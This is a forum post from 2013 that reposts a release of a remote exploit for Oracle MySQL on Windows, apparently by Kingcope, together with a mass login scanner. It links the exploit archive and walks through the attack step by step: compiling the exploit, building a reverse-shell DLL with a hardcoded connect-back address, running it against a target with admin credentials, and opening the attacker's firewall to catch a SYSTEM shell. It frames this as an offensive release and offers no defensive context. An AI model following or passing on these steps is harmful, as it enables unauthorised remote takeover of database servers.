wind Posted March 19, 2013 Report Posted March 19, 2013 ***FARLiGHT ELiTE HACKERS LEGACY R3L3ASE***Attached is the MySQL Windows Remote Exploit (post-auth, udftechnique) including the previously released mass scanner.The exploit is mirrored at the farlight website http://www.farlight.org.Oracle MySQL on Windows Remote SYSTEM Level Exploit zerodayAll owned By Kingcopehttp://www.exploit-db.com/sploits/23073.tar.gzInstallation Instructions=============================1. Install mysql client libraries and headers (UNIX)RedHat based (e.g. CentOS):yum install mysql mysql-devel2. Compile the standalone exploitissue commands:gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient3. Compile the reverse shell payload (this is required!)required because the connect back ip and port are hardcoded in the dll:use mingw on windows or winechange REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you haveto change the port in mysqljackpot.c too (default port: 443).issue commands:set PATH=%PATH%;c:\MinGW\bin\gcc -c payload.cgcc -shared -o payload.dll payload.o -lws2_32copy the payload.dll into the mysqljackpot exploit folder4. Run The Exploit./mysqljackpot -u root -p "" -t 99.99.99.99A valid database admin user and his password are requiredfor the exploit to work properly.This exploit is especially useful when used in connectionto a MySQL login scanner, see scanner/README.mysql inside this package.Be sure to have the firewall open on the desired reverse porton the attacking machine.5. Enjoy your SYSTEM Shell!!!Yours Sincerely,-- Kingcope Quote